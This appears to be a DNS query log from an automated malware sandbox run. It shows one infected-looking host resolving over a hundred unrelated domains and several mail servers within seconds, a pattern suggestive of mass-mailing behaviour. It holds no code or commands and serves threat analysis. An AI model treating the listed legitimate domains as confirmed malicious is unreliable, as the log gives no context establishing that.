                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.692864895 CET8.8.8.8192.168.2.60xbd74No error (0)usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.713696003 CET8.8.8.8192.168.2.60x7d23No error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.716090918 CET8.8.8.8192.168.2.60x1833No error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.716090918 CET8.8.8.8192.168.2.60x1833No error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.765243053 CET8.8.8.8192.168.2.60x96d0No error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.816111088 CET8.8.8.8192.168.2.60x316eServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.846214056 CET8.8.8.8192.168.2.60xabf5No error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.875962019 CET8.8.8.8192.168.2.60xeca5No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.888900995 CET8.8.8.8192.168.2.60x9896No error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.976882935 CET8.8.8.8192.168.2.60xba0No error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.983720064 CET8.8.8.8192.168.2.60xa7d6No error (0)tabbles.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.983720064 CET8.8.8.8192.168.2.60xa7d6No error (0)tabbles.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.135701895 CET8.8.8.8192.168.2.60x5e28No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.223299980 CET8.8.8.8192.168.2.60x4d2No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.252620935 CET8.8.8.8192.168.2.60x3617No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.252688885 CET8.8.8.8192.168.2.60xa3f3No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.253326893 CET8.8.8.8192.168.2.60x5f8eNo error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.290728092 CET8.8.8.8192.168.2.60xe513No error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.387520075 CET8.8.8.8192.168.2.60x3c90No error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.419028044 CET8.8.8.8192.168.2.60xf15No error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.635447979 CET8.8.8.8192.168.2.60xef4aNo error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.665755987 CET8.8.8.8192.168.2.60x5461No error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.673624039 CET8.8.8.8192.168.2.60xca88No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.674199104 CET8.8.8.8192.168.2.60xd2faNo error (0)arowines.com104.164.117.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.694530010 CET8.8.8.8192.168.2.60xc37dNo error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.720962048 CET8.8.8.8192.168.2.60x7672No error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.763057947 CET8.8.8.8192.168.2.60x219No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.763057947 CET8.8.8.8192.168.2.60x219No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.784583092 CET8.8.8.8192.168.2.60x378cNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.097659111 CET8.8.8.8192.168.2.60xcf77No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.097659111 CET8.8.8.8192.168.2.60xcf77No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.188961029 CET8.8.8.8192.168.2.60xafb7Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.206087112 CET8.8.8.8192.168.2.60xd9a9No error (0)bount.com.tw188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.206087112 CET8.8.8.8192.168.2.60xd9a9No error (0)bount.com.tw188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.251842022 CET8.8.8.8192.168.2.60x316eServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.259707928 CET8.8.8.8192.168.2.60x541dServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.331815958 CET8.8.8.8192.168.2.60xe686No error (0)onzcda.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.400629997 CET8.8.8.8192.168.2.60x911aNo error (0)k-nikko.com18.177.67.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.424470901 CET8.8.8.8192.168.2.60x1469No error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.424470901 CET8.8.8.8192.168.2.60x1469No error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.424470901 CET8.8.8.8192.168.2.60x1469No error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.424470901 CET8.8.8.8192.168.2.60x1469No error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.440807104 CET8.8.8.8192.168.2.60x93d2No error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.440807104 CET8.8.8.8192.168.2.60x93d2No error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.440807104 CET8.8.8.8192.168.2.60x93d2No error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.440807104 CET8.8.8.8192.168.2.60x93d2No error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.480173111 CET8.8.8.8192.168.2.60x195fNo error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.480173111 CET8.8.8.8192.168.2.60x195fNo error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.641010046 CET8.8.8.8192.168.2.60xca9eNo error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.672629118 CET8.8.8.8192.168.2.60x1d57No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.672629118 CET8.8.8.8192.168.2.60x1d57No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.691354990 CET8.8.8.8192.168.2.60x375cNo error (0)yasuma.com61.200.81.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.897917032 CET8.8.8.8192.168.2.60xe804No error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.897917032 CET8.8.8.8192.168.2.60xe804No error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.897917032 CET8.8.8.8192.168.2.60xe804No error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.933381081 CET8.8.8.8192.168.2.60x4962No error (0)revoldia.net45.200.235.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.934969902 CET8.8.8.8192.168.2.60x2f07No error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.936502934 CET8.8.8.8192.168.2.60x40e8No error (0)smtp.compuserve.comeast.us.smtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.936502934 CET8.8.8.8192.168.2.60x40e8No error (0)east.us.smtp.aol.comsmtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.936502934 CET8.8.8.8192.168.2.60x40e8No error (0)smtp.aol.comsmtp.cs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.936502934 CET8.8.8.8192.168.2.60x40e8No error (0)smtp.cs.comsmtp.aol.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.936502934 CET8.8.8.8192.168.2.60x40e8No error (0)smtp.aol.g03.yahoodns.net87.248.97.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.953948021 CET8.8.8.8192.168.2.60x9d4fNo error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.030227900 CET8.8.8.8192.168.2.60x2929No error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.030227900 CET8.8.8.8192.168.2.60x2929No error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.060710907 CET8.8.8.8192.168.2.60xa178No error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.060710907 CET8.8.8.8192.168.2.60xa178No error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.138345957 CET8.8.8.8192.168.2.60x3ca6No error (0)pcoyuncu.com213.142.131.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.232407093 CET8.8.8.8192.168.2.60xed9aNo error (0)arowines.com104.164.117.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.248122931 CET8.8.8.8192.168.2.60x541dServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.268285036 CET8.8.8.8192.168.2.60x316eServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.326108932 CET8.8.8.8192.168.2.60x45b4No error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.332946062 CET8.8.8.8192.168.2.60xdc0No error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.372963905 CET8.8.8.8192.168.2.60x65d7No error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.396147013 CET8.8.8.8192.168.2.60x2828No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.402010918 CET8.8.8.8192.168.2.60x4996Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.458666086 CET8.8.8.8192.168.2.60xa0bdName error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.477018118 CET8.8.8.8192.168.2.60xef41No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.477018118 CET8.8.8.8192.168.2.60xef41No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.479537010 CET8.8.8.8192.168.2.60xe02fName error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.609030008 CET8.8.8.8192.168.2.60x281No error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.613734961 CET8.8.8.8192.168.2.60x10bcNo error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.660012007 CET8.8.8.8192.168.2.60x1873No error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.674524069 CET8.8.8.8192.168.2.60x7dd7Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.704005003 CET8.8.8.8192.168.2.60xca0cNo error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.717552900 CET8.8.8.8192.168.2.60x65e9No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.717552900 CET8.8.8.8192.168.2.60x65e9No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.756721020 CET8.8.8.8192.168.2.60x13e1No error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.756721020 CET8.8.8.8192.168.2.60x13e1No error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.756721020 CET8.8.8.8192.168.2.60x13e1No error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.756721020 CET8.8.8.8192.168.2.60x13e1No error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.009056091 CET8.8.8.8192.168.2.60x4759No error (0)revoldia.net45.200.235.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.019884109 CET8.8.8.8192.168.2.60xcf46No error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.074228048 CET8.8.8.8192.168.2.60x9856Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.244667053 CET8.8.8.8192.168.2.60x541dServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.307074070 CET8.8.8.8192.168.2.60xd458No error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.307117939 CET8.8.8.8192.168.2.60x4583No error (0)rast.se89.221.250.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.331464052 CET8.8.8.8192.168.2.60x6ec3No error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.427164078 CET8.8.8.8192.168.2.60x180No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.427164078 CET8.8.8.8192.168.2.60x180No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.427164078 CET8.8.8.8192.168.2.60x180No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.427164078 CET8.8.8.8192.168.2.60x180No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.432971954 CET8.8.8.8192.168.2.60xeb8No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.451837063 CET8.8.8.8192.168.2.60xef1dNo error (0)geecl.com213.175.217.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.487728119 CET8.8.8.8192.168.2.60x6904No error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.523264885 CET8.8.8.8192.168.2.60x19f2No error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.713430882 CET8.8.8.8192.168.2.60xf5cdServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.743916035 CET8.8.8.8192.168.2.60xfa96No error (0)eos-i.commacx1980.qy56.supcname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.743916035 CET8.8.8.8192.168.2.60xfa96No error (0)macx1980.qy56.supcname.commfddos.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.743916035 CET8.8.8.8192.168.2.60xfa96No error (0)mfddos.datacname.com15.204.18.132.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.743916035 CET8.8.8.8192.168.2.60xfa96No error (0)15.204.18.132.datacname.com15.204.18.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.763335943 CET8.8.8.8192.168.2.60x7ddbNo error (0)www.dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.763335943 CET8.8.8.8192.168.2.60x7ddbNo error (0)www.dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.781852007 CET8.8.8.8192.168.2.60xffd8Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.813957930 CET8.8.8.8192.168.2.60x246eNo error (0)sokuwan.net185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.813957930 CET8.8.8.8192.168.2.60x246eNo error (0)sokuwan.net185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.813957930 CET8.8.8.8192.168.2.60x246eNo error (0)sokuwan.net185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.864943981 CET8.8.8.8192.168.2.60x3915No error (0)www.stajum.com103.3.1.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.898035049 CET8.8.8.8192.168.2.60xdd2bNo error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.925407887 CET8.8.8.8192.168.2.60xd281No error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:32.101217031 CET8.8.8.8192.168.2.60xe44aNo error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:32.306251049 CET8.8.8.8192.168.2.60x316eServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:32.699037075 CET8.8.8.8192.168.2.60xf5cdServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:32.837510109 CET8.8.8.8192.168.2.60xcf90Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:33.260236025 CET8.8.8.8192.168.2.60x541dServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:33.853533983 CET8.8.8.8192.168.2.60xcf90Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:34.283910990 CET8.8.8.8192.168.2.60xd303Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:34.909529924 CET8.8.8.8192.168.2.60xcf90Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:35.291363955 CET8.8.8.8192.168.2.60xd303Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:36.292824984 CET8.8.8.8192.168.2.60xd303Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:36.453227043 CET8.8.8.8192.168.2.60xc848Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:36.917114019 CET8.8.8.8192.168.2.60xcf90Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:40.152762890 CET8.8.8.8192.168.2.60x6b16No error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:40.303124905 CET8.8.8.8192.168.2.60x2116No error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:40.303124905 CET8.8.8.8192.168.2.60x2116No error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:40.303124905 CET8.8.8.8192.168.2.60x2116No error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:40.766659975 CET8.8.8.8192.168.2.60x9c14No error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:40.787796021 CET8.8.8.8192.168.2.60xbfa3No error (0)semuk.com52.128.23.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:40.951097965 CET8.8.8.8192.168.2.60x4536No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:41.000045061 CET8.8.8.8192.168.2.60xc873No error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:41.263737917 CET8.8.8.8192.168.2.60xf37fNo error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:41.263737917 CET8.8.8.8192.168.2.60xf37fNo error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:41.263737917 CET8.8.8.8192.168.2.60xf37fNo error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:41.263737917 CET8.8.8.8192.168.2.60xf37fNo error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:41.543423891 CET8.8.8.8192.168.2.60xc878Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:42.239648104 CET8.8.8.8192.168.2.60x5e11No error (0)tabbles.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:42.239648104 CET8.8.8.8192.168.2.60x5e11No error (0)tabbles.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:42.430754900 CET8.8.8.8192.168.2.60x7090No error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:44.130114079 CET8.8.8.8192.168.2.60x38dbNo error (0)sokuwan.net185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:44.130114079 CET8.8.8.8192.168.2.60x38dbNo error (0)sokuwan.net185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:44.130114079 CET8.8.8.8192.168.2.60x38dbNo error (0)sokuwan.net185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.367871046 CET8.8.8.8192.168.2.60xd24Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.370842934 CET8.8.8.8192.168.2.60xe035Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.373203039 CET8.8.8.8192.168.2.60x6415No error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.373203039 CET8.8.8.8192.168.2.60x6415No error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.506781101 CET8.8.8.8192.168.2.60xff71No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.511512995 CET8.8.8.8192.168.2.60xbf79No error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.511512995 CET8.8.8.8192.168.2.60xbf79No error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.683371067 CET8.8.8.8192.168.2.60xfdcbNo error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.746156931 CET8.8.8.8192.168.2.60x8838No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.793567896 CET8.8.8.8192.168.2.60xb838No error (0)vfcindia.com68.71.135.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.059751034 CET8.8.8.8192.168.2.60x125No error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.059751034 CET8.8.8.8192.168.2.60x125No error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.358290911 CET8.8.8.8192.168.2.60xc91bNo error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
